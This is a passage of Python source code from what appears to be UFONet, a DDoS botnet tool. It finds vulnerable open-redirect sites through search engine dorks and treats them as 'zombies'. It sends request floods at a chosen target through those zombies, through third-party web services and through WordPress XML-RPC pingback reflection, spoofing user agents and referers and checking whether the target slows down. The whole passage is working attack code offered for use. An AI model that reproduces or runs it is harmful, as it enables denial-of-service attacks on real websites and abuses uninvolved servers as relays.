 2248. regex = 'snippet" href="(.+?)">' # regex magics
 2249. pattern = re.compile(regex)
 2250. url_links = re.findall(pattern, req_reply)
 2251. else: # no valid search engine
 2252. print('[Error] [AI] This search engine is not supported!\n')
 2253. if not options.dorks or options.autosearch:
 2254. if not self.options.forceyes:
 2255. update_reply = raw_input("[AI] Do you want to try a different search engine? (Y/n)")
 2256. else:
 2257. update_reply = "Y"
 2258. if update_reply == "n" or update_reply == "N":
 2259. return #sys.exit(2)
 2260. print "\nSearch engines available:"
 2261. print '-'*25
 2262. for e in self.search_engines:
 2263. print "+ "+e
 2264. print '-'*25
 2265. print "\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'"
 2266. return #sys.exit(2)
 2267. else:
 2268. req_reply = ''
 2269. if options.num_results: # set number of results to search
 2270. try:
 2271. num = int(options.num_results)
 2272. except:
 2273. print("[Info] [AI] You should specify an integer!... Using default value: 10\n")
 2274. num = 10
 2275. else:
 2276. num = 10
 2277. total_results = 1
 2278. for url in url_links: # general parse on urls
 2279. if int(num) < int(total_results):
 2280. break
 2281. if options.engine == "bing":
 2282. if " h=" in url: # regex magics [18/08/2016]
 2283. url = url.rsplit('" h=',1)[0]
 2284. if options.engine == "yahoo":
 2285. if 'RU=' in url: # regex magics [18/08/2016]
 2286. url = url.rsplit('RU=',1)[1]
 2287. if 'UTF-8&u=' in url: # regex magics [05/02/2018]
 2288. url = url.rsplit('UTF-8&u=',1)[1]
 2289. total_results = total_results + 1 # results counter
 2290. url_link = url.strip('?q=') # parse url_links to retrieve only a url
 2291. url_link = urllib.unquote(url_link).decode('utf8') # unquote encoding
 2292. if options.search:
 2293. sep = str(options.search)
 2294. if options.dorks or options.autosearch:
 2295. sep = str(dork)
 2296. url_link = url_link.rsplit(sep, 1)[0] + sep
 2297. if 'href="' in url_link:
 2298. url_link = url_link.rsplit('href="', 1)[1]
 2299. if "instreamset" in url_link: # invalid zombie
 2300. url_link = "" # discarded
 2301. if '" ' in url_link:
 2302. url_link = url_link.rsplit('" ', 1)[1]
 2303. if options.engine in url_link:
 2304. url_link = "" # discarded
 2305. if 'http' not in url_link:
 2306. url_link = "" # discarded
 2307. else:
 2308. if url_link not in zombies and url_link+os.linesep not in zombies_found and url_link is not "": # AI mode (parsing search engines mixed pool and stored army)
 2309. print('+Victim found: ' + url_link)
 2310. print '-'*12
 2311. zombies.append(url_link)
 2312. else:
 2313. pass
 2314. if len(zombies) == 0: # print dorking results
 2315. print "[Info] [AI] NOT any NEW victim(s) found for this query!"
 2316. if not options.dorks:
 2317. if not options.autosearch:
 2318. if not self.options.forceyes:
 2319. return #sys.exit(2)
 2320. print "\n" + '-'*44 + '\n'
 2321. self.total_possible_zombies = self.total_possible_zombies + len(zombies)
 2322. return zombies
 2323. def check_nat(self):
 2324. # check for NAT configuration
 2325. options = self.options
 2326. tor_reply = urllib2.urlopen(self.check_tor_url).read() # check if TOR is enabled
 2327. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip()
 2328. check_ip_service = None
 2329. if not tor_reply or 'Congratulations' not in tor_reply:
 2330. print("[Info] [AI] It seems that you are not using TOR to recieve data. -> [OK!]\n")
 2331. else:
 2332. print("[Error] [AI] You are using TOR as public IP... It's not possible to NAT! -> [Aborting!]\n")
 2333. self.nat_error_flag = "ON"
 2334. return #sys.exit(2)
 2335. try:
 2336. data = str(urlopen(self.check_ip_service1).read()) # check for public ip
 2337. self.pub_ip = re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1)
 2338. check_ip_service = self.check_ip_service1
 2339. except:
 2340. try: # another check for public ip
 2341. data = str(urlopen(self.check_ip_service2).read())
 2342. self.pub_ip = re.compile(r'">(\d+\.\d+\.\d+\.\d+)</span>').search(data).group(1)
 2343. check_ip_service = self.check_ip_service2
 2344. except:
 2345. print("[Error] [AI] Something wrong checking your public IP! -> [Exiting!]\n")
 2346. self.nat_error_flag = "ON"
 2347. return
 2348. t = urlparse(check_ip_service)
 2349. name_service = t.netloc
 2350. print " + Public: " + self.pub_ip + " | "+name_service+"\n"
 2351. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 2352. s.connect(('8.8.8.8', 0)) # connecting to a UDP address doesn't send packets (black magic)
 2353. self.local_ip = s.getsockname()[0]
 2354. print " + Local: " + self.local_ip + "\n"
 2355. print '='*22 + '\n'
 2356. def extract_ucavs(self):
 2357. # extract ucavs from file
 2358. options = self.options
 2359. try:
 2360. f = open(self.ucavs_file)
 2361. ucavs = f.readlines()
 2362. ucavs = [ ucav.replace('\n','') for ucav in ucavs ]
 2363. f.close()
 2364. if not ucavs:
 2365. print "[Info] [AI] [Control] Cannot retrieve [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]"
 2366. self.options.disableucavs = True
 2367. return
 2368. else:
 2369. return ucavs
 2370. except:
 2371. if os.path.exists(self.ucavs_file) == True:
 2372. print "[Info] [AI] [Control] Cannot open [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]"
 2373. return #sys.exit(2)
 2374. else:
 2375. print "[Info] [AI] [Control] Cannot found [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]"
 2376. return #sys.exit(2)
 2377. def discarding_ucavs(self, ucav, ucavs):
 2378. if ucav in self.discard_ucavs:
 2379. ucavs.remove(ucav)
 2380. if self.options.verbose:
 2381. print("[Info] [AI] [Control] [UCAVs] "+str(ucav)+" is not working! -> [Discarding!]")
 2382. self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
 2383. return ucavs
 2384. def send_ucavs(self, ucavs):
 2385. # extract external status checkers, perform a request and check results
 2386. time.sleep(5) # aiming (multi-threading flow time compensation)
 2387. if not self.options.disablepurge:
 2388. if not ucavs: # return when not any working
 2389. self.options.disableucavs = True
 2390. return
 2391. options = self.options
 2392. target = self.options.target
 2393. shuffle(ucavs) # shuffle ucavs order, each round :-)
 2394. if not self.options.disablepurge:
 2395. for ucav in ucavs:
 2396. if not ucav.startswith('http'): # discarded inmediately
 2397. self.discard_ucavs.append(ucav)
 2398. self.num_discard_ucavs = self.num_discard_ucavs + 1
 2399. ucavs = self.discarding_ucavs(ucav, ucavs) # check if ucav is failing for autobalance army
 2400. if not self.options.disablepurge:
 2401. if not ucavs: # return when not any working
 2402. self.options.disableucavs = True
 2403. return
 2404. shuffle(ucavs) # shuffle ucavs order, each discarding check :-)
 2405. for ucav in ucavs:
 2406. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2407. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2408. if target.startswith("http://"): # parse target for some checkers
 2409. target = target.replace('http://','')
 2410. elif target.startswith("https://"):
 2411. target = target.replace('https://','')
 2412. url = ucav + target
 2413. t = urlparse(ucav)
 2414. name_ucav = t.netloc
 2415. if name_ucav == "":
 2416. name_ucav = ucav
 2417. if options.verbose:
 2418. print("[Info] [UCAVs] Sniping: " + url)
 2419. try:
 2420. if options.proxy: # set proxy
 2421. self.proxy_transport(options.proxy)
 2422. if options.timeout: # set timeout
 2423. ucav_timeout = options.timeout
 2424. else:
 2425. ucav_timeout = 1
 2426. if ucav_timeout < 1:
 2427. ucav_timeout = 1
 2428. req = urllib2.Request(url, None, headers)
 2429. target_reply = urllib2.urlopen(req, context=self.ctx, timeout=ucav_timeout).read()
 2430. self.ucavs_hit = self.ucavs_hit + 1 # add ucav hit to stats
 2431. except:
 2432. print "[Info] [UCAVs] " + name_ucav + " -> FAILED (cannot connect!)"
 2433. if not self.options.disablepurge:
 2434. self.discard_ucavs.append(ucav)
 2435. self.num_discard_ucavs = self.num_discard_ucavs + 1
 2436. self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
 2437. target_reply = ""
 2438. if target_reply == "": # check for target's status resolved by [UCAVs]
 2439. pass
 2440. else:
 2441. if not "is down" or not "looks down" in target_reply: # parse external service for reply
 2442. print "[Info] [UCAVs] " + name_ucav + " -> Target is ONLINE! -> [Keep shooting!]"
 2443. self.num_is_up = self.num_is_up + 1
 2444. else:
 2445. print "[Info] [UCAVs] " + name_ucav + " -> Target looks OFFLINE! -> [Checking!]"
 2446. self.num_is_down = self.num_is_down + 1
 2447. if self.options.verbose:
 2448. print "[Info] [AI] [UCAVs] "+str(name_ucav)+" is returning..."
 2449. self.extra_zombies_lock = False # [ARMY] have finished
 2450. def extract_median(self, num_list):
 2451. # extract median form a list of numbers
 2452. num_list.sort()
 2453. z = len(num_list)
 2454. if not z%2:
 2455. return (float(num_list[(z/2)-1])+float(num_list[z/2]))/2
 2456. else:
 2457. return float(num_list[z/2])
 2458. def check_is_loading(self, target):
 2459. # perform a broadband test (using GET) to analize target's reply to the traffic generated each round
 2460. self.start = None
 2461. self.stop = None
 2462. print '\n---------'
 2463. print "\n[Info] [AI] Scanning target to check for levels on defensive shields...\n"
 2464. if target.endswith(""):
 2465. target.replace("", "/")
 2466. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2467. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2468. try:
 2469. req = urllib2.Request(target, None, headers)
 2470. if self.options.proxy: # set proxy
 2471. self.proxy_transport(self.options.proxy)
 2472. if self.options.timeout: # set timeout
 2473. try:
 2474. timeout = int(self.options.timeout)
 2475. except:
 2476. timeout = 1
 2477. else:
 2478. timeout = 1
 2479. if timeout < 1:
 2480. timeout = 1
 2481. self.start = time.time()
 2482. target_reply = urllib2.urlopen(req, context=self.ctx, timeout=timeout).read()
 2483. header = urllib2.urlopen(req, context=self.ctx).info()
 2484. self.stop = time.time()
 2485. except:
 2486. print('[Info] [AI] Our scanner cannot connect to the target this round! -> [Skipping!]\n')
 2487. return
 2488. try:
 2489. s, size_name = self.convert_size(len(target_reply))
 2490. self.loadcheck_size_list.append(s) # add record to size list
 2491. size = '%s %s' % (s,size_name)
 2492. except:
 2493. size = "Error!"
 2494. try:
 2495. time_required = self.stop - self.start
 2496. load = self.convert_time(time_required)
 2497. self.loadcheck_load_list.append(load) # add record to load list
 2498. except:
 2499. load = "Error!"
 2500. self.loadcheck_counter = self.loadcheck_counter + 1
 2501. print ' -Total tests:', self.loadcheck_counter, "\n"
 2502. if self.loadcheck_prev_size is not None and self.loadcheck_prev_load is not None:
 2503. lsm = self.extract_median(self.loadcheck_size_list)
 2504. if lsm is not None:
 2505. self.loadcheck_size_median = str(lsm) + " " + size_name
 2506. else:
 2507. self.loadcheck_size_median = None
 2508. llm = self.extract_median(self.loadcheck_load_list)
 2509. if llm is not None:
 2510. self.loadcheck_load_median = str(llm) + " seconds"
 2511. else:
 2512. self.loadcheck_load_median = None
 2513. if self.loadcheck_counter == 2: # first round
 2514. print ' -Bytes in (first round) :', self.loadcheck_first_size
 2515. print ' -Bytes in (this round) :', size
 2516. if self.loadcheck_size_median is not None:
 2517. print ' -Bytes in (median) :', self.loadcheck_size_median
 2518. print ' ----'
 2519. print ' -Load time (first round) :', self.loadcheck_first_load, "seconds"
 2520. print ' -Load time (this round) :', load, "seconds"
 2521. if self.loadcheck_load_median is not None:
 2522. print ' -Load time (median) :', self.loadcheck_load_median, "\n"
 2523. else:
 2524. print "\n"
 2525. self.loadcheck_size_max = None
 2526. self.loadcheck_size_min = None
 2527. self.loadcheck_load_max = None
 2528. self.loadcheck_load_min = None
 2529. elif self.loadcheck_counter > 2: # rest of rounds
 2530. lsmax = max(self.loadcheck_size_list)
 2531. if lsmax is not None:
 2532. self.loadcheck_size_max = str(lsmax) + " " + size_name
 2533. else:
 2534. self.loadcheck_size_max = None
 2535. lsmin = min(self.loadcheck_size_list)
 2536. if lsmin is not None:
 2537. self.loadcheck_size_min = str(lsmin) + " " + size_name
 2538. else:
 2539. self.loadcheck_size_min = None
 2540. llmax = max(self.loadcheck_load_list)
 2541. if llmax is not None:
 2542. self.loadcheck_load_max = str(llmax) + " seconds"
 2543. else:
 2544. self.loadcheck_load_max = None
 2545. llmin = min(self.loadcheck_load_list)
 2546. if llmin is not None:
 2547. self.loadcheck_load_min = str(llmin) + " seconds"
 2548. else:
 2549. self.loadcheck_load_min = None
 2550. print ' -Bytes in (first round) :', self.loadcheck_first_size
 2551. print ' -Bytes in (previous round) :', self.loadcheck_prev_size
 2552. print ' -Bytes in (this round) :', size
 2553. if self.loadcheck_size_max is not None:
 2554. print ' -Bytes in (max) :', self.loadcheck_size_max
 2555. if self.loadcheck_size_min is not None:
 2556. print ' -Bytes in (min) :', self.loadcheck_size_min
 2557. if self.loadcheck_size_median is not None:
 2558. print ' -Bytes in (median) :', self.loadcheck_size_median
 2559. print ' ----'
 2560. print ' -Load time (first round) :', self.loadcheck_first_load, "seconds"
 2561. print ' -Load time (previous round):', self.loadcheck_prev_load, "seconds"
 2562. print ' -Load time (this round) :', load, "seconds"
 2563. if self.loadcheck_load_max is not None:
 2564. print ' -Load time (max) :', self.loadcheck_load_max
 2565. if self.loadcheck_load_min is not None:
 2566. print ' -Load time (min) :', self.loadcheck_load_min
 2567. if self.loadcheck_load_median is not None:
 2568. print ' -Load time (median) :', self.loadcheck_load_median, "\n"
 2569. else:
 2570. print "\n"
 2571. if self.loadcheck_prev_load < load: # target is loading more slowly
 2572. print "[Info] [Scanner] Target is serving the content more slowly this round! ;-) -> [Keep shooting!]\n"
 2573. elif self.loadcheck_prev_load == load: # inmutable target
 2574. print "[Info] [Scanner] Attack is not having any effect on your target this round... -> [Keep shooting!]\n"
 2575. elif self.loadcheck_prev_load > load: # is target defending?
 2576. print "[Info] [Scanner] Target is loading this round faster than the previous one! -> [o_0]\n"
 2577. else:
 2578. print ' -Bytes in (this round) :', size
 2579. print ' -Load time (this round):', load, "seconds\n"
 2580. self.loadcheck_first_size = size
 2581. self.loadcheck_first_load = load
 2582. self.loadcheck_size_median = None
 2583. self.loadcheck_load_median = None
 2584. self.loadcheck_size_max = None
 2585. self.loadcheck_size_min = None
 2586. self.loadcheck_load_max = None
 2587. self.loadcheck_load_min = None
 2588. self.loadcheck_prev_size = size # record previous size
 2589. self.loadcheck_prev_load = load # record previous load
 2590. def convert_size(self, size):
 2591. if (size == 0):
 2592. return '0 B'
 2593. size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
 2594. i = int(math.floor(math.log(size,1024)))
 2595. p = math.pow(1024,i)
 2596. s = round(size/p,2)
 2597. return s, size_name[i]
 2598. def convert_time(self, time):
 2599. return '%.2f' % time
 2600. def discarding_zombies(self, zombie, zombies):
 2601. if zombie in self.discardzombies:
 2602. zombies.remove(zombie)
 2603. if self.options.verbose:
 2604. print("[Info] [AI] [Control] [Zombies] "+str(zombie)+" is not working! -> [Discarding!]")
 2605. return zombies
 2606. def send_zombies(self, zombies):
 2607. # send Open Redirect zombies
 2608. time.sleep(1) # aiming (multi-threading flow time compensation)
 2609. if not self.options.disablepurge:
 2610. if not zombies:
 2611. self.empty_zombies = True
 2612. return
 2613. if self.options.verbose:
 2614. print "[Info] [AI] [Control] Deploying [Zombies] with 'maser-melee' weapons..."
 2615. options = self.options
 2616. target = self.options.target
 2617. shuffle(zombies) # shuffle zombies order, each round :-)
 2618. if not self.options.disablepurge:
 2619. for zombie in zombies: # check if zombie is failing for autobalance army
 2620. if not zombie.startswith('http'): # discarded inmediately
 2621. self.discardzombies.append(zombie)
 2622. self.num_discard_zombies = self.num_discard_zombies + 1
 2623. zombies = self.discarding_zombies(zombie, zombies)
 2624. if not self.options.disablepurge:
 2625. if not zombies: # return when not any working
 2626. self.empty_zombies = True
 2627. return
 2628. for zombie in zombies:
 2629. t = urlparse(zombie)
 2630. name_zombie = t.netloc
 2631. if name_zombie == "":
 2632. name_zombie = zombie
 2633. if not self.options.attackme:
 2634. print "[Info] [Zombies] Attacking from: " + name_zombie
 2635. else: # on attackme, target url is dynamic -> http://public_ip:port/hash|zombie
 2636. self.mothership_hash = random.getrandbits(128) # generating random evasion hash
 2637. target = "http://" + str(self.pub_ip) + ":" + self.port + "/"+ str(self.mothership_hash) + "|" + zombie
 2638. self.options.target = target
 2639. print "[Info] [Zombies] Attacking: " + str(self.pub_ip) + ":" + self.port + " -> [LAN]" + self.local_ip + ":" + self.port
 2640. print "[Info] [Zombies] Payload: " + target
 2641. print '='*55, "\n"
 2642. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2643. if not options.target.startswith('http'):
 2644. if options.forcessl:
 2645. options.target = "https://" + options.target
 2646. else:
 2647. options.target = "http://" + options.target
 2648. self.attack_mode = True
 2649. try:
 2650. if options.verbose:
 2651. print "[Info] [Zombies] Sniping: " + options.target
 2652. self.connect_zombies(zombie)
 2653. if self.options.dbstress: # try to stress db on target by using vulnerable Open Redirect web servers
 2654. self.db_flash = self.db_flash + 1
 2655. stress = self.stressing(target, zombie)
 2656. except Exception:
 2657. print "[Info] [Zombies] " + zombie + " -> FAILED (cannot connect!)"
 2658. self.total_zombies_failed_connection = self.total_zombies_failed_connection + 1 # used to manage threading pool
 2659. if not self.options.disablepurge:
 2660. self.discardzombies.append(zombie)
 2661. self.num_discard_zombies = self.num_discard_zombies + 1
 2662. if self.options.verbose:
 2663. print "[Info] [AI] [Zombies] "+str(name_zombie)+" is returning..."
 2664. self.attack_mode = False
 2665. def discarding_aliens(self, alien, aliens):
 2666. if alien in self.discard_aliens:
 2667. aliens.remove(alien)
 2668. if self.options.verbose:
 2669. print("[Info] [AI] [Control] [Aliens] "+str(alien)+" is not working! -> [Discarding!]")
 2670. self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
 2671. return aliens
 2672. def send_aliens(self, aliens):
 2673. # extract external web abuse services urls (POST) and perform requests against target
 2674. time.sleep(2) # aiming (multi-threading flow time compensation)
 2675. if not self.options.disablepurge:
 2676. if not aliens: # return when not any working
 2677. self.options.disablealiens = True
 2678. return
 2679. target = self.options.target
 2680. options = self.options
 2681. shuffle(aliens) # shuffle aliens
 2682. if not self.options.disablepurge:
 2683. for alien in aliens:
 2684. if not alien.startswith('http'): # discarded inmediately
 2685. self.discard_aliens.append(alien)
 2686. self.num_discard_aliens = self.num_discard_aliens + 1
 2687. aliens = self.discarding_aliens(alien, aliens) # check if alien is failing for autobalance army
 2688. if not self.options.disablepurge:
 2689. if not aliens: # return when not any working
 2690. self.options.disablealiens = True
 2691. return
 2692. shuffle(aliens) # shuffle aliens order, each discarding check :-)
 2693. for alien in aliens:
 2694. if "$POST" in alien: # extract alien/parameters -> search for $POST delimiter on 'aliens.txt' file
 2695. regex_alien = re.compile('{}(.*){}'.format(re.escape(''), re.escape(';$POST'))) # regex magics
 2696. pattern_alien = re.compile(regex_alien)
 2697. alien_url = re.findall(pattern_alien, alien) # HTTP POST url for submit data
 2698. regex_param = re.compile('{}(.*){}'.format(re.escape('$POST;'), re.escape(''))) # regex magics
 2699. pattern_param = re.compile(regex_param)
 2700. param = re.findall(pattern_param, alien) # HTTP POST params to submit
 2701. for u in alien_url:
 2702. url = u # ex: POST -> path/submit.php
 2703. t = urlparse(url)
 2704. name_alien = t.netloc
 2705. if name_alien == "":
 2706. name_alien = alien
 2707. print "[Info] [Aliens] Attacking from: " + name_alien
 2708. for p in param:
 2709. param_target = {p : target} # ex POST -> url=target
 2710. param_target = urllib.urlencode(param_target)
 2711. try:
 2712. if options.verbose:
 2713. print "[Info] [Aliens] Sniping: " + url + " - POST:", param_target
 2714. if options.proxy: # set proxy
 2715. self.proxy_transport(options.proxy)
 2716. if self.options.timeout: # set timeout
 2717. try:
 2718. alien_timeout = int(self.options.timeout)
 2719. except:
 2720. alien_timeout = 1
 2721. else:
 2722. alien_timeout = 1
 2723. if alien_timeout < 1:
 2724. alien_timeout = 1
 2725. req = urllib2.Request(url, param_target)
 2726. rsp = urllib2.urlopen(req, context=self.ctx, timeout=alien_timeout)
 2727. self.aliens_hit = self.aliens_hit + 1 # add hit to aliens stats
 2728. except Exception:
 2729. print "[Info] [Aliens] " + name_alien + " -> FAILED (cannot connect!)"
 2730. self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
 2731. if not self.options.disablepurge:
 2732. self.discard_aliens.append(alien)
 2733. self.num_discard_aliens = self.num_discard_aliens + 1
 2734. else:
 2735. print("[Info] [Aliens] "+str(alien)+" -> FAILED (invalid alien!)")
 2736. self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
 2737. if not self.options.disablepurge:
 2738. self.discard_aliens.append(alien)
 2739. self.num_discard_aliens = self.num_discard_aliens + 1
 2740. if self.options.verbose:
 2741. print "[Info] [AI] [Aliens] "+str(name_alien)+" is returning..."
 2742. if self.options.disabledroids and self.options.disablerpcs and self.options.disableucavs:
 2743. self.extra_zombies_lock = False # [ARMY] have finished
 2744. def extract_aliens(self):
 2745. # extract aliens from file
 2746. options = self.options
 2747. try:
 2748. f = open(self.aliens_file)
 2749. aliens = f.readlines()
 2750. aliens = [ alien.replace('\n','') for alien in aliens ]
 2751. f.close()
 2752. if not aliens:
 2753. print "[Info] [AI] [Control] Cannot retrieve [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]"
 2754. self.options.disablealiens = True
 2755. return
 2756. else:
 2757. return aliens
 2758. except:
 2759. if os.path.exists(self.aliens_file) == True:
 2760. print "[Info] [AI] [Control] Cannot open [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]"
 2761. return #sys.exit(2)
 2762. else:
 2763. print "[Info] [AI] [Control] Cannot found [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]"
 2764. return #sys.exit(2)
 2765. def discarding_droids(self, droid, droids):
 2766. if droid in self.discard_droids:
 2767. droids.remove(droid)
 2768. if self.options.verbose:
 2769. print("[Info] [AI] [Control] [Droids] "+str(droid)+" is not working! -> [Discarding!]")
 2770. self.droids_fail = self.droids_fail + 1 # add fail to droids stats
 2771. return droids
 2772. def send_droids(self, droids):
 2773. # extract external web abuse services urls (GET) and perform requests against target
 2774. time.sleep(3) # aiming (multi-threading flow time compensation)
 2775. if not self.options.disablepurge:
 2776. if not droids: # return when not any working
 2777. self.options.disabledroids = True
 2778. return
 2779. target = self.options.target
 2780. target = urllib.unquote(target).decode('utf8') # parte urlencoding
 2781. if target.startswith('http://'): # remove http
 2782. target = target.replace('http://', '')
 2783. if target.startswith('https://'):
 2784. target = target.replace('https://', '') # remove https
 2785. options = self.options
 2786. shuffle(droids) # shuffle droids
 2787. if not self.options.disablepurge:
 2788. for droid in droids:
 2789. if not droid.startswith('http'): # discarded inmediately
 2790. self.discard_droids.append(droid)
 2791. self.num_discard_droids = self.num_discard_droids + 1
 2792. droids = self.discarding_droids(droid, droids) # check if droid is failing for autobalance army
 2793. if not self.options.disablepurge:
 2794. if not droids: # return when not any working
 2795. self.options.disabledroids = True
 2796. return
 2797. shuffle(droids) # shuffle droids order, each discarding check :-)
 2798. for droid in droids:
 2799. if "$TARGET" in droid: # replace droid/parameter for target
 2800. url = droid.replace("$TARGET", target)
 2801. t = urlparse(url)
 2802. name_droid = t.netloc
 2803. if name_droid == "":
 2804. name_droid = droid
 2805. print "[Info] [Droids] Attacking from: " + name_droid
 2806. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2807. headers = {'User-Agent' : self.user_agent, 'Content-type' : "application/x-www-form-urlencoded", 'Referer' : self.referer, 'Connection' : 'keep-alive'} # set fake headers
 2808. try:
 2809. if options.proxy: # set proxy
 2810. self.proxy_transport(options.proxy)
 2811. if self.options.timeout: # set timeout
 2812. try:
 2813. droid_timeout = int(self.options.timeout)
 2814. except:
 2815. droid_timeout = 1
 2816. else:
 2817. droid_timeout = 1
 2818. if droid_timeout < 1:
 2819. droid_timeout = 1
 2820. req = urllib2.Request(url, None, headers)
 2821. rsp = urllib2.urlopen(req, context=self.ctx, timeout=droid_timeout)
 2822. self.droids_hit = self.droids_hit + 1 # add hit to droids stats
 2823. except Exception:
 2824. print "[Info] [Droids] " + name_droid + " -> FAILED (cannot connect!)"
 2825. self.droids_fail = self.droids_fail + 1 # add fail to droids stats
 2826. if not self.options.disablepurge:
 2827. self.discard_droids.append(droid)
 2828. self.num_discard_droids = self.num_discard_droids + 1
 2829. else:
 2830. print "[Info] [Droids] " + str(droid) + " -> FAILED (invalid droid!)"
 2831. self.droids_fail = self.droids_fail + 1 # add fail to droids stats
 2832. if not self.options.disablepurge:
 2833. self.discard_droids.append(droid)
 2834. self.num_discard_droids = self.num_discard_droids + 1
 2835. if self.options.verbose:
 2836. print "[Info] [AI] [Droids] "+str(name_droid)+" is returning..."
 2837. if self.options.disablerpcs and self.options.disableucavs:
 2838. self.extra_zombies_lock = False # [ARMY] have finished
 2839. def extract_droids(self):
 2840. # extract droids from file
 2841. options = self.options
 2842. try:
 2843. f = open(self.droids_file)
 2844. droids = f.readlines()
 2845. droids = [ droid.replace('\n','') for droid in droids ]
 2846. f.close()
 2847. if not droids:
 2848. print "[Info] [AI] [Control] Cannot retrieve [Droids] from: 'botnet/droids.txt' -> [Discarding!]"
 2849. self.options.disabledroids = True
 2850. return
 2851. else:
 2852. return droids
 2853. except:
 2854. if os.path.exists(self.droids_file) == True:
 2855. print "[Info] [AI] [Control] Cannot open [Droids] from: 'botnet/droids.txt' -> [Discarding!]"
 2856. return #sys.exit(2)
 2857. else:
 2858. print "[Info] [AI] [Control] Cannot found [Droids] from: 'botnet/droids.txt' -> [Discarding!]"
 2859. return #sys.exit(2)
 2860. def discarding_rpcs(self, rpc, rpcs):
 2861. if rpc in self.discard_rpcs:
 2862. rpcs.remove(rpc)
 2863. if self.options.verbose:
 2864. print("[Info] [AI] [Control] [X-RPCs] "+str(rpc)+" is not working! -> [Discarding!]")
 2865. return rpcs
 2866. def send_rpcs(self, rpcs):
 2867. # extract vulnerable XML-RPC pingback services and perform requests against target
 2868. time.sleep(4) # aiming (multi-threading flow time compensation)
 2869. if not self.options.disablepurge:
 2870. if not rpcs: # return when not any working
 2871. self.options.disablerpcs = True
 2872. return
 2873. target = self.options.target
 2874. options = self.options
 2875. def random_key(length):
 2876. key = ''
 2877. for i in range(length):
 2878. key += random.choice(string.lowercase + string.uppercase + string.digits)
 2879. return key
 2880. shuffle(rpcs) # shuffle rpcs
 2881. if not self.options.disablepurge:
 2882. for rpc in rpcs:
 2883. if not rpc.startswith('http'): # discarded inmediately
 2884. if not self.options.disablepurge:
 2885. self.discard_rpcs.append(rpc)
 2886. self.num_discard_rpcs = self.num_discard_rpcs + 1
 2887. self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
 2888. rpcs = self.discarding_rpcs(rpc, rpcs) # check if rpc is failing for autobalance army
 2889. if not self.options.disablepurge:
 2890. if not rpcs: # return when not any working
 2891. self.options.disablerpcs = True
 2892. return
 2893. shuffle(rpcs) # shuffle rpcs order, each discarding check :-)
 2894. for rpc in rpcs:
 2895. t = urlparse(rpc)
 2896. name_rpc = t.netloc
 2897. if name_rpc == "":
 2898. name_rpc = rpc
 2899. print "[Info] [X-RPCs] Attacking from: " + name_rpc
 2900. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
 2901. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2902. key = random_key(8) # generate random value page to bypass cache
 2903. rpc_page = "?" + str(key)
 2904. key = random_key(6) # re-generate random value id to bypass cache
 2905. rpc_id = "=" + str(key)
 2906. target_place = target + rpc_page + rpc_id # random place to bypass cache (ex: www.target.com?U7OvBdp1=4lMcNj)
 2907. if "/xmlrpc.php" in rpc:
 2908. rpc_place = rpc.replace("xmlrpc.php", "")
 2909. rpc_exploit = "<methodCall><methodName>pingback.ping</methodName><params><param><value><string>"+target_place+"</string></value></param><param><value><string>"+rpc_place+"</string></value></param></params></methodCall>"
 2910. try:
 2911. if options.proxy: # set proxy
 2912. self.proxy_transport(options.proxy)
 2913. if self.options.timeout: # set timeout
 2914. try:
 2915. rpc_timeout = int(self.options.timeout)
 2916. except:
 2917. rpc_timeout = 1
 2918. else:
 2919. rpc_timeout = 1
 2920. if rpc_timeout < 1:
 2921. rpc_timeout = 1
 2922. req = urllib2.Request(rpc, rpc_exploit, headers)
 2923. urllib2.urlopen(req, context=self.ctx, timeout=rpc_timeout)
 2924. self.rpcs_hit = self.rpcs_hit + 1 # add rpc hit to stats
 2925. if self.options.verbose:
 2926. print "[Info] [X-RPCs] Reply:", target_reply
 2927. except:
 2928. print "[Info] [X-RPCs] " + name_rpc + " -> FAILED (cannot connect!)"
 2929. self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
 2930. if not self.options.disablepurge:
 2931. self.discard_rpcs.append(rpc)
 2932. self.num_discard_rpcs = self.num_discard_rpcs + 1
 2933. else:
 2934. print "[Info] [X-RPCs] " + name_rpc + " -> FAILED (invalid X-RPC!)"
 2935. self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
 2936. if not self.options.disablepurge:
 2937. self.discard_rpcs.append(rpc)
 2938. self.num_discard_rpcs = self.num_discard_rpcs + 1
 2939. if self.options.verbose:
 2940. print "[Info] [AI] [X-RPCs] "+str(name_rpc)+" is returning..."
 2941. if self.options.disableucavs:
 2942. self.extra_zombies_lock = False # [ARMY] have finished
 2943. def extract_rpcs(self):
 2944. # extract rpcs from file
 2945. options = self.options
 2946. try:
 2947. f = open(self.rpcs_file)
 2948. rpcs = f.readlines()
 2949. rpcs = [ rpc.replace('\r','') for rpc in rpcs ]
 2950. rpcs = [ rpc.replace('\n','') for rpc in rpcs ]
 2951. f.close()
 2952. if not rpcs:
 2953. print "[Info] [AI] [Control] Cannot retrieve [X-RPCs] from: 'botnet/rpcs.txt' -> [Discarding!]"
 2954. self.options.disablerpcs = True
 2955. return
 2956. else:
 2957. return rpcs
 2958. except:
 2959. if os.path.exists(self.rpcs_file) == True:
